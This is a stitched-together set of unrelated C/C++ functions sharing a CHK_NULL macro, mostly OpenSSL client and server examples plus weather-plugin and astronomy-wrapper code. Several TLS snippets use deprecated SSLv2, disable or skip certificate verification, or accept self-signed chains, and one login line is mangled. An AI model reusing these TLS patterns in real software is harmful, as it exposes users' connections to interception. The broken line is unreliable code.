int openhost(char *host, int port) { struct hostent *hp; register int s; struct sockaddr_in sin; int err; X509 *server_cert; char *str; if ((hp = gethostbyname(host)) == NULL) { printf("ERR: gethostbyname\n"); return (-1); } if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return (-1); } sin.sin_family = AF_INET; sin.sin_port = htons(port); bcopy(hp->h_addr, &sin.sin_addr, hp->h_length); alarm(30); if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) < 0) return (-1); alarm(0); SSLeay_add_ssl_algorithms(); SSL_load_error_strings(); /* ctx = SSL_CTX_new (SSLv23_method()); CHK_NULL(ctx); */ ctx = SSL_CTX_new(SSLv2_method()); CHK_NULL(ctx); ssl = SSL_new(ctx); CHK_NULL(ssl); SSL_set_fd(ssl, s); err = SSL_connect(ssl); CHK_SSL(err); printf("SSL connection using %s\n", SSL_get_cipher(ssl)); server_cert = SSL_get_peer_certificate(ssl); CHK_NULL(server_cert); printf("Server certificate:\n"); str = X509_NAME_oneline(X509_get_subject_name(server_cert), NULL, 0); CHK_NULL(str); printf("\t subject: %s\n", str); Free(str); str = X509_NAME_oneline(X509_get_issuer_name(server_cert), NULL, 0); CHK_NULL(str); printf("\t issuer: %s\n", str); Free(str); X509_free(server_cert); return (s); }
int ssl_client_handshake(struct Client *cptr) { char *str; int err; cptr->ssl = (struct SSL*)SSL_new (ctx); CHK_NULL(cptr->ssl); SSL_set_fd ((SSL*)cptr->ssl, cptr->fd); set_blocking(cptr->fd); err = SSL_connect ((SSL*)cptr->ssl); set_non_blocking(cptr->fd); if ((err)==-1) { irclog(L_NOTICE,"Could connect to %s:Error in SSL_connect()", get_client_name(cptr, TRUE)); return 0; } /* Following two steps are optional and not required for data exchange to be successful. */ /* Get the cipher - opt */ set_blocking(cptr->fd); irclog (L_NOTICE,"SSL connection using %s", SSL_get_cipher ((SSL*)cptr->ssl)); SetSecure(cptr); /* Get server's certificate (note: beware of dynamic allocation) - opt */ cptr->client_cert = (struct X509*)SSL_get_peer_certificate ((SSL *)cptr->ssl); set_non_blocking(cptr->fd); if (cptr->client_cert != NULL) { irclog (L_NOTICE,"Server certificate:"); str = X509_NAME_oneline (X509_get_subject_name ((X509*)cptr->client_cert),0,0); CHK_NULL(str); irclog (L_NOTICE, "\t subject: %s", str); // Free (str); free (str); str = X509_NAME_oneline (X509_get_issuer_name ((X509*)cptr->client_cert),0,0); CHK_NULL(str); irclog (L_NOTICE, "\t issuer: %s", str); // Free (str); free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free ((X509*)cptr->client_cert); } else irclog (L_NOTICE, "Server does not have certificate."); return 1; }
static gchar * get_data_wind (xml_wind *data, datas_wind type) { gchar *str = NULL; if (!data) { //DBG ("get_data_wind: xml-wind not present"); return EMPTY_STRING; } //DBG ("starting"); switch(type) { case _WIND_SPEED: str = data->s; break; case _WIND_GUST: str = data->gust; break; case _WIND_DIRECTION: str = data->t; break; case _WIND_TRANS: str = data->d; break; } //DBG ("print %p", data->d); //DBG ("%s", str); return CHK_NULL(str); }
/* -- This is not the same as the previous functions */ static gchar * get_data_cc (xml_cc *data, datas type) { gchar *str = NULL; if (!data) { //DBG ("get_data_cc: xml-cc not present"); return EMPTY_STRING; } switch(type) { case LSUP: str = data->lsup; break; case OBST: str = data->obst; break; case FLIK: str = data->flik; break; case TRANS: str = data->t; break; case TEMP: str = data->tmp; break; case HMID: str = data->hmid; break; case VIS: str = data->vis; break; case UV_INDEX: return get_data_uv(data->uv, _UV_INDEX); case UV_TRANS: return get_data_uv(data->uv, _UV_TRANS); case WIND_SPEED: return get_data_wind(data->wind, _WIND_SPEED); case WIND_GUST: return get_data_wind(data->wind, _WIND_GUST); case WIND_DIRECTION: return get_data_wind(data->wind, _WIND_DIRECTION); case WIND_TRANS: return get_data_wind(data->wind, _WIND_TRANS); case BAR_R: return get_data_bar(data->bar, _BAR_R); case BAR_D: return get_data_bar(data->bar, _BAR_D); case DEWP: str = data->dewp; break; case WICON: str = data->icon; break; } return CHK_NULL(str); }
/* rdvr is responsible for reading variables of all types. It wraps the * output of uvgetvr_c into various python structures, and returns * arrays as numpy arrays. */ PyObject * UVObject_rdvr(UVObject *self, PyObject *args) { char *name, *type, value[MAXVAR]; int length, updated; npy_intp dims[1]; PyArrayObject *rv; if (!PyArg_ParseTuple(args, "ss", &name, &type)) return NULL; uvprobvr_c(self->tno, name, value, &length, &updated); dims[0] = length; try { switch (type[0]) { case 'a': uvgetvr_c(self->tno,H_BYTE,name,value,length+1); return PyString_FromStringAndSize(value, length); case 'j': uvgetvr_c(self->tno,H_INT2,name,value,length); if (length == 1) return PyInt_FromLong((long) ((short *)value)[0]); rv = (PyArrayObject *) PyArray_SimpleNew(1, dims, PyArray_INT); CHK_NULL(rv); for (int i=0; i < length; i++) IND1(rv,i,int) = ((short *)value)[i]; return PyArray_Return(rv); case 'i': RET_IA(H_INT,PyInt_FromLong,long,int,PyArray_INT); case 'r': RET_IA(H_REAL,PyFloat_FromDouble,double,float,PyArray_FLOAT); case 'd': RET_IA(H_DBLE,PyFloat_FromDouble,double,double,PyArray_DOUBLE); case 'c': if (length == 1) { uvgetvr_c(self->tno,H_CMPLX,name,value,length); return PyComplex_FromDoubles(((double *)value)[0], ((double *)value)[1]); } rv = (PyArrayObject *) PyArray_SimpleNew(1,dims,PyArray_CDOUBLE); CHK_NULL(rv); uvgetvr_c(self->tno,H_CMPLX,name,(char *)rv->data,length); return PyArray_Return(rv); default: PyErr_Format(PyExc_ValueError,"unknown var type: %c",type[0]); return NULL; } } catch (MiriadError &e) { PyErr_Format(PyExc_RuntimeError, e.get_message()); return NULL; } }
/* Wrapper over uvread_c to deal with numpy arrays, conversion of baseline * and polarization codes, and returning a tuple of all results. */ PyObject * UVObject_read(UVObject *self, PyObject *args) { PyArrayObject *data, *flags, *uvw; PyObject *rv; int nread, n2read, i, j; double preamble[PREAMBLE_SIZE]; if (!PyArg_ParseTuple(args, "i", &n2read)) return NULL; // Make numpy arrays to hold the results npy_intp data_dims[1] = {n2read}; data = (PyArrayObject *) PyArray_SimpleNew(1, data_dims, PyArray_CFLOAT); CHK_NULL(data); flags = (PyArrayObject *) PyArray_SimpleNew(1, data_dims, PyArray_INT); CHK_NULL(flags); while (1) { // Here is the MIRIAD call try { uvread_c(self->tno, preamble, (float *)data->data, (int *)flags->data, n2read, &nread); } catch (MiriadError &e) { PyErr_Format(PyExc_RuntimeError, e.get_message()); return NULL; } if (preamble[3] != self->curtime) { self->intcnt += 1; self->curtime = preamble[3]; } if ((self->intcnt-self->decphase) % self->decimate == 0 || nread==0) { break; } } // Now we build a return value of ((uvw,t,(i,j)), data, flags, nread) npy_intp uvw_dims[1] = {3}; uvw = (PyArrayObject *) PyArray_SimpleNew(1, uvw_dims, PyArray_DOUBLE); CHK_NULL(uvw); IND1(uvw,0,double) = preamble[0]; IND1(uvw,1,double) = preamble[1]; IND1(uvw,2,double) = preamble[2]; i = GETI(preamble[4]); j = GETJ(preamble[4]); rv = Py_BuildValue("((Od(ii))OOi)", (PyObject *)uvw, preamble[3], i, j, (PyObject *)data, (PyObject *)flags, nread); CHK_NULL(rv); Py_DECREF(uvw); Py_DECREF(data); Py_DECREF(flags); return rv; }
int ActionSet::init(char *filename){ FILE *fp=fopen(filename,"r"); CHK_NULL(fp,"ActionSet: could not open file\n"); char buf[BUF_LEN]; fgets(buf,BUF_LEN,fp);//skip first line while(!feof(fp)){ if(NULL==fgets(buf,BUF_LEN,fp)) break; if(*buf=='0') break; Action tmp(buf); //m_Data.push_back(tmp); m_Data.insert(make_pair(tmp.getfromId(),tmp)); } fclose(fp); return 0; }
static gchar * get_data_uv (xml_uv *data, datas_uv type) { gchar *str = NULL; if (!data) { //DBG ("get_data_bar: xml-uv not present"); return EMPTY_STRING; } switch(type) { case _UV_INDEX: str = data->i; break; case _UV_TRANS: str = data->t; break; } return CHK_NULL(str); }
static gchar * get_data_bar (xml_bar *data, datas_bar type) { gchar *str = NULL; if (!data) { //DBG ("get_data_bar: xml-wind not present"); return EMPTY_STRING; } switch(type) { case _BAR_R: str = data->r; break; case _BAR_D: str = data->d; break; } return CHK_NULL(str); }
static gchar * get_data_loc (xml_loc *data, datas_loc type) { gchar *str = NULL; if (!data) { //DBG ("get_data_loc: xml-loc not present"); return EMPTY_STRING; } switch(type) { case DNAM: str = data->dnam; break; case SUNR: str = data->sunr; break; case SUNS: str = data->suns; break; } return CHK_NULL(str); }
int ssl_handshake(struct Client *cptr) { char *str; int err; cptr->ssl = (struct SSL*) SSL_new (ctx); // cptr->use_ssl=1; CHK_NULL (cptr->ssl); SSL_set_fd ((SSL *)cptr->ssl, cptr->fd); set_non_blocking(cptr->fd); err = ircd_SSL_accept (cptr, cptr->fd); if ((err)==-1) { irclog(L_ERROR,"Lost connection to %s:Error in SSL_accept()", get_client_name(cptr, TRUE)); SSL_shutdown((SSL *)cptr->ssl); SSL_free((SSL *)cptr->ssl); cptr->ssl = NULL; return 0; } /* Get the cipher - opt */ SetSecure(cptr); irclog (L_DEBUG, "SSL connection using %s", SSL_get_cipher ((SSL *)cptr->ssl)); /* Get client's certificate (note: beware of dynamic * allocation) - opt */ cptr->client_cert = (struct X509*)SSL_get_peer_certificate ((SSL *)cptr->ssl); if (cptr->client_cert != NULL) { irclog (L_DEBUG,"Client certificate:"); str = X509_NAME_oneline (X509_get_subject_name ((X509*)cptr->client_cert), 0, 0); CHK_NULL (str); irclog (L_DEBUG, "\t subject: %s", str); // Bejvavalo // Free (str); free(str); str = X509_NAME_oneline (X509_get_issuer_name ((X509*)cptr->client_cert), 0, 0); CHK_NULL (str); irclog (L_DEBUG, "\t issuer: %s", str); // Bejvavalo // Free (str); free(str); /* We could do all sorts of certificate * verification stuff here before * deallocating the certificate. */ X509_free ((X509*)cptr->client_cert); } else irclog (L_DEBUG, "Client does not have certificate."); return 1; }
void main () { int err; SSL_CTX* ctx; SSL* ssl; X509* client_cert; char* str; char buf [4096]; FILE* log; log = fopen ("/dev/console", "a"); CHK_NULL(log); fprintf (log, "inetdserv %ld\n", (long)getpid()); SSL_load_error_strings(); ctx = SSL_CTX_new (); CHK_NULL(ctx); err = SSL_CTX_use_RSAPrivateKey_file (ctx, KEYF, SSL_FILETYPE_PEM); CHK_SSL (err); err = SSL_CTX_use_certificate_file (ctx, CERTF, SSL_FILETYPE_PEM); CHK_SSL (err); /* inetd has already opened the TCP connection, so we can get right down to business. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, fileno(stdin)); err = SSL_accept (ssl); CHK_SSL(err); /* Get the cipher - opt */ fprintf (log, "SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get client's certificate (note: beware of dynamic allocation) - opt */ client_cert = SSL_get_peer_certificate (ssl); if (client_cert != NULL) { fprintf (log, "Client certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (client_cert)); CHK_NULL(str); fprintf (log, "\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (client_cert)); CHK_NULL(str); fprintf (log, "\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (client_cert); } else fprintf (log, "Client doe not have certificate.\n"); /* ------------------------------------------------- */ /* DATA EXCHANGE: Receive message and send reply */ err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err); buf[err] = '\0'; fprintf (log, "Got %d chars:'%s'\n", err, buf); err = SSL_write (ssl, "Loud and clear.", strlen("Loud and clear.")); CHK_SSL(err); /* Clean up. */ fclose (log); SSL_free (ssl); SSL_CTX_free (ctx); }
int main () { int err; int listen_sd; int sd; struct sockaddr_in sa_serv; struct sockaddr_in sa_cli; size_t client_len; SSL_CTX* ctx; SSL* ssl; X509* client_cert; char* str; char buf [4096]; SSL_METHOD *meth; int optval =1; /* SSL preliminaries. We keep the certificate and key with the context. */ SSL_load_error_strings(); SSLeay_add_ssl_algorithms(); meth = SSLv23_server_method(); ctx = SSL_CTX_new (meth); if (!ctx) { ERR_print_errors_fp(stderr); exit(2); } if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(3); } if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(4); } if (!SSL_CTX_check_private_key(ctx)) { fprintf(stderr,"Private key does not match the certificate public key\n"); exit(5); } /* ----------------------------------------------- */ /* Prepare TCP socket for receiving connections */ listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket"); memset (&sa_serv, '\0', sizeof(sa_serv)); sa_serv.sin_family = AF_INET; sa_serv.sin_addr.s_addr = INADDR_ANY; sa_serv.sin_port = htons (8889); /* Server Port number */ err = bind(listen_sd, (struct sockaddr*) &sa_serv, sizeof (sa_serv)); CHK_ERR(err, "bind"); /* Receive a TCP connection. */ err = listen (listen_sd, 5); CHK_ERR(err, "listen"); client_len = sizeof(sa_cli); sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len); CHK_ERR(sd, "accept"); /* added by Carman Neustaedter, thanks to Hal & Darcy Set address to be reusable. int optval=1 was added above 1 means turn this option on 0 means turn this option off SO_REUSEADDR specifies that we will toggle the feature of address reuse */ if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&optval, sizeof(optval)) <0) { perror("Error attempting to reuse address"); exit(0); } close (listen_sd); printf ("\nIn server. Connection from %lx, port %x\n", sa_cli.sin_addr.s_addr, sa_cli.sin_port); /* ----------------------------------------------- */ /* TCP connection is ready. Do server side SSL. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sd); err = SSL_accept (ssl); CHK_SSL(err); /* Get the cipher - opt */ printf ("In server. SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get client's certificate (note: beware of dynamic allocation) - opt client_cert = SSL_get_peer_certificate (ssl); if (client_cert != NULL) { printf ("Client certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t subject: %s\n", str); Free (str); str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t issuer: %s\n", str); Free (str); We could do all sorts of certificate verification stuff here before deallocating the certificate. X509_free (client_cert); } else printf ("Client does not have certificate.\n"); DATA EXCHANGE - Receive message and send reply. */ err = SSL_read (ssl, buf, sizeof(buf) - 1); printf("In server. Just after the first read\n\n"); CHK_SSL(err); buf[err] = '\0'; printf ("GotGOT %d chars:'%s'\n", err, buf); err = SSL_write (ssl, "I hear you!!.", strlen("I hear you!!.")); CHK_SSL(err); /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); }
bool str2bin( t_vtype type, gchar * str, gpointer value) /* * Opposite to the above really. Given a string, convert the contents * into an object pointed to by 'value' which is assumed to be large * enough to contain it. The exception is if it is of type string, * where gpointer is assumed to be a pointer to a string (ie char **), * whereupon it will be set to point to a duplicate (MALLOCed) of 'str'. */ { CHK_NULL(value, FALSE); switch(type) { case type_none: E("Type set to 'none' - conversion not possible"); break; case type_bool: if(g_str_equal(str, TRUE_TEXT)) { *(bool *)value = TRUE; return TRUE; } if(g_str_equal(str, FALSE_TEXT)) { *(bool *)value = FALSE; return TRUE; } return FALSE; case type_char: *(gchar **)value = g_strdup(str); break; case type_short: *(short *)value = (short)atoi(str); return TRUE; case type_int: *(int *)value = atoi(str); return TRUE; case type_long: *(long *)value = atol(str); return TRUE; case type_float: *(float *)value = (float)atof(str); return TRUE; case type_double: *(double *)value = atof(str); return TRUE; case type_string: *(gchar **)value = g_strdup(str); return TRUE; case type_date: /* Date only dd/mm/yyyy */ *(time_t *)value = m_date2long(str); return TRUE; case type_time: /* Time only hh:mm:ss */ *(time_t *)value = m_time2long(str); return TRUE; case type_datetime: /* Both date & time */ *(time_t *)value = m_datetime2long(str); return TRUE; default: E("Illegal or unknown conversion type (%d)", type); } return FALSE; /* Failed */ } /* str2bin() */
int main () { int err; int sd; struct sockaddr_in sa; SSL_CTX* ctx; SSL* ssl; X509* server_cert; char* str; char buf [4096]; SSL_METHOD *meth; SSLeay_add_ssl_algorithms(); meth = SSLv23_client_method(); SSL_load_error_strings(); ctx = SSL_CTX_new (meth); CHK_NULL(ctx); CHK_SSL(err); SSL_CTX_set_verify(ctx,SSL_VERIFY_PEER,NULL); SSL_CTX_load_verify_locations(ctx,CACERT,NULL); if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(-2); } if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(-3); } if (!SSL_CTX_check_private_key(ctx)) { printf("Private key does not match the certificate public keyn"); exit(-4); } /* ----------------------------------------------- */ /* Create a socket and connect to server using normal socket calls. */ sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); memset (&sa, '\0', sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr ("127.0.0.1"); /* Server IP */ sa.sin_port = htons (1111); /* Server Port number */ err = connect(sd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); /* ----------------------------------------------- */ /* Now we have TCP conncetion. Start SSL negotiation. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sd); err = SSL_connect (ssl); CHK_SSL(err); /* Following two steps are optional and not required for data exchange to be successful. */ /* Get the cipher - opt */ printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get server's certificate (note: beware of dynamic allocation) - opt */ server_cert = SSL_get_peer_certificate (ssl); CHK_NULL(server_cert); printf ("Server certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (server_cert),0,0); CHK_NULL(str); printf ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (server_cert),0,0); CHK_NULL(str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (server_cert); /* --------------------------------------------------- */ /* DATA EXCHANGE - Send a message and receive a reply. */ err = SSL_write (ssl, "Hello World!", strlen("Hello World!")); CHK_SSL(err); err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err); buf[err] = '\0'; printf ("Got %d chars:'%s'\n", err, buf); SSL_shutdown (ssl); /* send SSL/TLS close_notify */ /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); return 0; }
void *thread_main (void *arg) { int s, AcceptSocket; #ifdef _WIN32 WORD wVersionRequested; WSADATA wsaData; #endif /* */ struct sockaddr_in service; int err; size_t client_len; SSL_CTX *ctx; SSL *ssl; X509 *client_cert; char *str; char buf[1024]; ssl = (SSL *) arg; //取出socket s = SSL_get_fd (ssl); //接受SSL连接 err = SSL_accept (ssl); if (err < 0) { printf ("ssl accerr\n"); return; } printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); //检索证书 client_cert = SSL_get_peer_certificate (ssl); if (client_cert != NULL) { printf ("Client certificate:\n"); //获得客户端证书subject并转变成字符型,以便进行打印 str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0); CHK_NULL (str); printf ("\t subject: %s\n", str); OPENSSL_free (str); //获得客户端证书issuer并转变成字符型,以便进行打印 str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0); CHK_NULL (str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); X509_free (client_cert); } else printf ("Client does not have certificate.\n"); //进行安全会话 memset (buf, 0, 1024); err = SSL_read (ssl, buf, sizeof (buf) - 1); if (err < 0) { printf ("ssl read err\n"); close (s); return; } printf ("get : %s\n", buf); #if 0 buf[err] = '\0'; err = SSL_write (ssl, "I hear you.", strlen ("I hear you.")); #endif /* */ SSL_free (ssl); close (s); }
struct host_ret openhost(char *host, int port, int dossl) { struct hostent *hp; struct sockaddr_in sin; struct host_ret ret; #ifdef USE_SSLEAY int err; X509 *server_cert; char *str; #endif ret.s = -1; if ((hp = gethostbyname(host)) == NULL) { fprintf(stderr, "ERR: gethostbyname: %s\n", host); return (ret); } if ((ret.s = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); return (ret); } sin.sin_family = AF_INET; sin.sin_port = htons(port); bcopy(hp->h_addr, &sin.sin_addr, hp->h_length); alarm(30); if (connect(ret.s, (struct sockaddr *) &sin, sizeof(sin)) < 0) { close(ret.s); ret.s = -1; return (ret); } alarm(0); #ifdef USE_SSLEAY if (dossl) { SSLeay_add_ssl_algorithms(); SSL_load_error_strings(); ret.ctx = SSL_CTX_new(SSLv2_method()); CHK_NULL(ret.ctx); ret.ssl = SSL_new(ret.ctx); CHK_NULL(ret.ssl); SSL_set_fd(ret.ssl, ret.s); err = SSL_connect(ret.ssl); CHK_SSL(err); server_cert = SSL_get_peer_certificate(ret.ssl); CHK_NULL(server_cert); str = X509_NAME_oneline(X509_get_subject_name(server_cert), NULL, 0); CHK_NULL(str); Free(str); str = X509_NAME_oneline(X509_get_issuer_name(server_cert), NULL, 0); CHK_NULL(str); Free(str); if (server_cert) X509_free(server_cert); } #endif /* USE_SSLEAY */ return (ret); }
status_t SSO::SSLSend(const char *host, HTTPFormatter *send, HTTPFormatter **recv) { int err = B_OK; int sd; struct sockaddr_in sa; struct hostent *hp; SSL_CTX *ctx; SSL *ssl; char buffer[1024]; SSL_METHOD *meth; SSL_load_error_strings(); SSLeay_add_ssl_algorithms(); meth = SSLv23_client_method(); ctx = SSL_CTX_new (meth); CHK_NULL(ctx); SSL_CTX_set_options(ctx, SSL_OP_ALL); /* ----------------------------------------------- */ /* Create a socket and connect to server using normal socket calls. */ sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(sd, "socket"); // clear sa memset (&sa, '\0', sizeof(sa)); // get address if ((hp= gethostbyname(host)) == NULL) { sa.sin_addr.s_addr = inet_addr (host); /* Server IP */ } else { memcpy((char *)&sa.sin_addr,hp->h_addr,hp->h_length); /* set address */ }; sa.sin_family = AF_INET; sa.sin_port = htons(443); /* Server Port number */ err = connect(sd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); /* ----------------------------------------------- */ /* Now we have TCP conncetion. Start SSL negotiation. */ ssl = SSL_new (ctx); CHK_NULL(ssl); if (SSL_set_fd(ssl, sd) == 0) { LOG(kProtocolName, liDebug, "C %lX: SSL Error setting fd", this); return -1; }; SSL_set_verify(ssl, SSL_VERIFY_NONE, NULL); SSL_set_connect_state(ssl); err = SSL_connect (ssl); CHK_SSL(err); /* --------------------------------------------------- */ /* DATA EXCHANGE - Send a message and receive a reply. */ err = SSL_write(ssl, send->Flatten(), send->Length()); CHK_SSL(err); if (err <= 0) { LOG(kProtocolName, liDebug, "C %lX: SSL Error writing. Err: %ld", this, SSL_get_error(ssl, err)); }; BString data; int received = 0; while (err > 0) { err = SSL_read(ssl, buffer, sizeof(buffer)); CHK_SSL(err); if (err > 0) { received += err; data.Append(buffer, err); memset(buffer, 0, sizeof(buffer)); }; }; *recv = new HTTPFormatter(data.String(), data.Length()); LOG(kProtocolName, liDebug, "C %lX: Got %d chars", this, received); SSL_shutdown (ssl); /* send SSL/TLS close_notify */ /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); return received; };
int main () { int err; int listen_sd; int sd; struct sockaddr_in sa_serv; struct sockaddr_in sa_cli; socklen_t client_len; SSL_CTX* ctx; SSL* ssl; X509* client_cert; char* str; char buf [4096]; const SSL_METHOD *meth; /* SSL preliminaries. We keep the certificate and key with the context. */ SSL_load_error_strings(); OpenSSL_add_ssl_algorithms(); meth = TLSv1_method(); ctx = SSL_CTX_new (meth); if (!ctx) { ERR_print_errors_fp(stderr); exit(2); } if (SSL_CTX_use_certificate_file(ctx, CERTF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(3); } if (SSL_CTX_use_PrivateKey_file(ctx, KEYF, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); exit(4); } if (!SSL_CTX_check_private_key(ctx)) { fprintf(stderr,"Private key does not match the certificate public key\n"); exit(5); } /* ----------------------------------------------- */ /* Prepare TCP socket for receiving connections */ listen_sd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(listen_sd, "socket"); memset(&sa_serv, 0, sizeof(sa_serv)); sa_serv.sin_family = AF_INET; sa_serv.sin_addr.s_addr = INADDR_ANY; sa_serv.sin_port = htons (1111); /* Server Port number */ err = bind(listen_sd, (struct sockaddr*) &sa_serv, sizeof (sa_serv)); CHK_ERR(err, "bind"); /* Receive a TCP connection. */ err = listen (listen_sd, 5); CHK_ERR(err, "listen"); client_len = sizeof(sa_cli); sd = accept (listen_sd, (struct sockaddr*) &sa_cli, &client_len); CHK_ERR(sd, "accept"); close (listen_sd); printf ("Connection from %lx, port %x\n", sa_cli.sin_addr.s_addr, sa_cli.sin_port); /* ----------------------------------------------- */ /* TCP connection is ready. Do server side SSL. */ ssl = SSL_new (ctx); CHK_NULL(ssl); SSL_set_fd (ssl, sd); err = SSL_accept (ssl); CHK_SSL(err); /* Get the cipher - opt */ printf ("SSL connection using %s\n", SSL_get_cipher (ssl)); /* Get client's certificate (note: beware of dynamic allocation) - opt */ client_cert = SSL_get_peer_certificate (ssl); if (client_cert != NULL) { printf ("Client certificate:\n"); str = X509_NAME_oneline (X509_get_subject_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t subject: %s\n", str); OPENSSL_free (str); str = X509_NAME_oneline (X509_get_issuer_name (client_cert), 0, 0); CHK_NULL(str); printf ("\t issuer: %s\n", str); OPENSSL_free (str); /* We could do all sorts of certificate verification stuff here before deallocating the certificate. */ X509_free (client_cert); } else printf ("Client does not have certificate.\n"); /* DATA EXCHANGE - Receive message and send reply. */ err = SSL_read (ssl, buf, sizeof(buf) - 1); CHK_SSL(err); buf[err] = '\0'; printf ("Got %d chars:'%s'\n", err, buf); err = SSL_write (ssl, "I hear you.", strlen("I hear you.")); CHK_SSL(err); /* Clean up. */ close (sd); SSL_free (ssl); SSL_CTX_free (ctx); return 0; }
/*********************parent process tcp connection use to manage************************/ void client_mgr(char *ip, int serverPort, int pipefd, int pid) { int flag = 0; char *p; char name[256], passwd[256]; char realName[512]; int err, fd, i; struct sockaddr_in sa; char buf[4096]; SSL_CTX* ctx; SSL* ssl; //create a TCP socket fd = socket (AF_INET, SOCK_STREAM, 0); CHK_ERR(fd, "socket"); memset (&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_addr.s_addr = inet_addr(ip); sa.sin_port = htons(serverPort); //connect step err = connect(fd, (struct sockaddr*) &sa, sizeof(sa)); CHK_ERR(err, "connect"); sleep(2); puts("Please input the common name: "); scanf("%s", realName); setupCTX(&ctx); //build SSL on the TCP connection ssl = SSL_new(ctx); CHK_NULL(ssl); SSL_set_fd (ssl, fd); err = SSL_connect(ssl); CHK_SSL(err); //check certificate SSL_CTX_load_verify_locations(ctx, CACERT, NULL); SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL); int result = SSL_get_verify_result(ssl); if(result == X509_V_OK || result == X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN) { printf("The certificate is valid.\n"); } else { printf("Invalid certificate %d\n", result); exit(1); } X509* server_cert = SSL_get_peer_certificate(ssl); CHK_NULL(server_cert); char *str = X509_NAME_oneline(X509_get_subject_name(server_cert),0,0); CHK_NULL(str); OPENSSL_free(str); str = X509_NAME_oneline(X509_get_issuer_name(server_cert),0,0); CHK_NULL(str); OPENSSL_free(str); X509_NAME *xname = X509_get_subject_name(server_cert); X509_NAME_get_text_by_NID(xname, NID_commonName, commonName, 512); if( strcasecmp(commonName, realName) !=0 ) { printf("commonName is wrong.\n"); exit(1); } printf("commonName is right.\n"); printf("Server authentication is successful.\n"); //release! X509_free(server_cert); sleep(2); while(!flag) { //handle the login part printf("username: "******"%s",name); getchar(); //safe mode set_disp_mode(STDIN_FILENO, 0); getpasswd(passwd, sizeof(passwd)); p = passwd; while(*p != '\n') p++; *p = '\0'; //OK! set_disp_mode(STDIN_FILENO, 1); sendName(ssl, name); sendPass(ssl, passwd); SSL_read(ssl, buf, sizeof(buf) - 1); putchar(10); if( buf[0] == 'o' ) { puts("Connect successfully"); flag = 1; } else { puts("wrong password, please try again!"); } } //clean the password for security reason memset(passwd, 0, sizeof(passwd)); genKey(key); sendKey(ssl, key); while (1) { talkToudp(key, pipefd, 'k'); printf("1. ipnut 'q' to quit.\n"); printf("2. input 'c' to change the key.\n"); scanf("%s", buf); if (strlen(buf) == 1) { if (buf[0]=='q') { break; } else if( buf[0]=='r'){ genKey(key); sendKey(ssl, key); } } else { printf("Invalid.\n"); continue; } } memset(key, 0, KEYSIZE); memset(IV, 0, IVSIZE); sendKey(ssl, key); sleep(1); kill(pid, SIGTERM); wait(0); SSL_shutdown(ssl); /* send SSL/TLS close_notify */ close(fd); SSL_free(ssl); SSL_CTX_free(ctx); }
